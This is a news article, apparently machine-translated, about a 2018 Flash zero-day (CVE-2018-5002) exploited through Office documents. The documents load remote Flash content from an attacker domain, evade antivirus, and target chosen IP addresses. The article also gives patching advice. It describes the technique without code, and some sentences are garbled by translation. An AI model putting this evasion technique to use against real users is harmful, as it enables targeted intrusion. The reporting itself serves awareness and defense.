Home
Tech info
Technology
Science
Life
Application
Electric
Program
Mobile
Windows 10
Windows 11The browser is too smart, hackers turn to embed zero-day Flash malicious code into Microsoft Office files
When unable to bypass the Flash browser, attackers are switching to Office files, most recently hackers targeting diplomats in the Middle East.
Because it is increasingly difficult to exploit vulnerabilities in Adobe Flash and other browser plugins, hackers have begun migrating to Microsoft Office to download Flash remotely and then use a zero-day vulnerability to control computers.
On Thursday, Adobe released a serious vulnerability patch CVE-2018-5002. Error with buffer overflow caused by Office file with embedded path to Flash file stored on people.dohabayt.com. When executing, the infected file will download the malicious payload from that domain. That is the evaluation of researchers at Icebrg and Qihoo 360, who discovered and reported separately to Adobe.
Over the past few years, the browser has begun to block Flash content by default to prevent drive-by attacks (exploits from malicious websites) exploiting Adobe's multi-user player vulnerability. However, some versions of Microsoft Office still download Flash, do not use or use very little, CEO Icebrg William Peteroy said. To avoid, users should make sure to prevent Flash from downloading when installed, or ask before downloading.
'Adobe Flash Player downloaded from Microsoft Store is a popular way to exploit via Flash because it has been disabled in the browser', researchers at Icebrg said. Often the Flash file is embedded in the document, making it undetectable by antivirus software. 'Unlike normal tactics, this type of attack uses lesser known features, takes remote Flash content instead of embedding it directly into the text. Only XML packages choose the Flash Player ActiveX and OLE Object to show the new parameters displayed '.
Examples of remote Flash objects embedded in Office documents
This attack makes the document without the exploit code, the harder it is to be detected. Remote downloads make it easy for an attacker to use only those vulnerabilities on predefined IP addresses instead of anyone opening the document, making it easy to hide them for long periods of time.
Over the years, security researchers have advised users to remove stand-alone Flash applications and use the default browser to block Flash content. From the recent incident, you should block Flash content in documents, especially from untrusted sources. If you still use Flash, make sure you are using the latest version 30.0.0.113 which can be downloaded here https://get.adobe.com/flashplayer/
See more:
- 6 ways to prevent Drive-by Download
- Hackers found a way to bypass Microsoft Office 365 Safe Links
- The unpatched Microsoft Word DDE vulnerability is exploited in a massive malware attack
Marvin FryYou should read it
- Difference between Flash drive and Pen drive
- Instructions for using USB Flash drive with iPhone
- The fastest top 5 USB flash you should buy
- How to Transfer Data from a Flash Drive to a Computer
- How to Unblock Flash Player
- Adobe released an emergency patch of Flash's security vulnerability
- Threats and risks from malware on USB Flash
- Instead of killing Flash, we should save it for posterity
May be interested
- Find bug in Emotet malware, prevent it from spreading for 6 months
according to researcher james quinn of the security firm binary defense, like other software, malicious code also has vulnerabilities, error codes. hackers can exploit software vulnerabilities to cause harm, security experts can also decompile the source code of malicious code to find the vulnerability to exploit and defeat the malicious code. - Reader code names famous games to infiltrate Microsoft Storea malicious code called electron bot has infiltrated microsoft's official app store, microsoft store.
- Video becomes a tool of malicious codeon november 14, security firm mcafee announced that it had discovered the w32 / realor computer worm specializing in infection and hiding in standard video files of real media format. by embedding or linking malicious code
- New weapons against malicious code are 'cloud' computing.the 'cloud computing' model of remote server-based data processing and results returned to the pc will incorporate 10 antivirus engines and two hackers to detect hackers to prevent the malicious code.
- How to scan and kill viruses, malicious codes on Samsung Smart TVs 2015experience the internet space with speed racing games, or action movies on the big screen will definitely bring users new experiences. however, the potential is quite dangerous when users download applications on the internet to tv, especially viruses or other types of malicious code.
- Warning: The new Facebook virus, a malicious code that is spreading rapidly through Messengerfrom yesterday (december 18, 2017), a new type of malicious code has appeared and raged in vietnam. this malicious code is not too sophisticated but is spreading very fast through facebook messenger because it is sent from the friends in the friend list.
- Embed malicious code into PDF file without security errorattack on the system through malicious code embedded in pdf files whether users open with the latest version of adobe reader or foxit reader.
- How does malicious code break into user PC (Part 2)the previous article detailed how aggressive hackers infect malicious code and can see that these are extremely dangerous attack techniques.
- Warning: Hackers can access smart speakersnow, as the trend of smart home grows, this also becomes the ideal target for hackers to exploit vulnerabilities in smart devices from refrigerators and televisions to smart speakers to perform behavior. unrighteous.
- Most Android anti-virus software cannot detect malicious APK filesapk file containing malicious code is a method that hackers often use to attack android users. unlike ios, android users can download and install apps from third-party app stores or download the app's apk file and install it themselves.
Attack the network
- Warning of new malware appear like Wannacry, capable of deleting Vietnamese percussion on computer
- Warning: Bkav detected more than 700,000 computers in Vietnam infected with virtual money digging virus that slowed down the computer
- Half a million computers in Vietnam suffer from dangerous spyware
- Hackers took control of 18,000 Huawei router devices in just one day
- The whole city had to return to the 'stone' era using typewriters because the entire computer system was hacked
- Millions of Android devices stick with security holes in firmware, hackers can exploit to lock users' machines
Warning of new malware appear like Wannacry, capable of deleting Vietnamese percussion on computer
Warning: Bkav detected more than 700,000 computers in Vietnam infected with virtual money digging virus that slowed down the computer
Half a million computers in Vietnam suffer from dangerous spyware
Hackers took control of 18,000 Huawei router devices in just one day
The whole city had to return to the 'stone' era using typewriters because the entire computer system was hacked
Millions of Android devices stick with security holes in firmware, hackers can exploit to lock users' machines